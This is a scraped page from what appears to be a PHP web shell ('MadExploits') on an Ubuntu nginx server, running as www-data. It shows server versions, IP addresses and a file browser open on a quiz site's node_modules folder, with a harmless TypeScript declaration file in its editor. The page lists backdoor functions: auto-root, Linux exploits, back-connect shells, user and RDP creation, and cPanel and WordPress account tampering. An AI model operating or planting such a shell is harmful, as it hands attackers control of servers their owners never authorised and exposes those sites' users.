Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
sisteransi /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.33
KB
-rw-rw-rw-
sisteransi.d.ts
1.08
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sisteransi.d.ts
export const beep: string; export const clear: string; export namespace cursor { export const left: string; export const hide: string; export const show: string; export const save: string; export const restore: string; export function to(x: number, y?: number): string; export function move(x: number, y: number): string; export function up(count?: number): string; export function down(count?: number): string; export function forward(count?: number): string; export function backward(count?: number): string; export function nextLine(count?: number): string; export function prevLine(count?: number): string; } export namespace scroll { export function up(count?: number): string; export function down(count?: number): string; } export namespace erase { export const screen: string; export const line: string; export const lineEnd: string; export const lineStart: string; export function up(count?: number): string; export function down(count?: number): string; export function lines(count: number): string; }
Close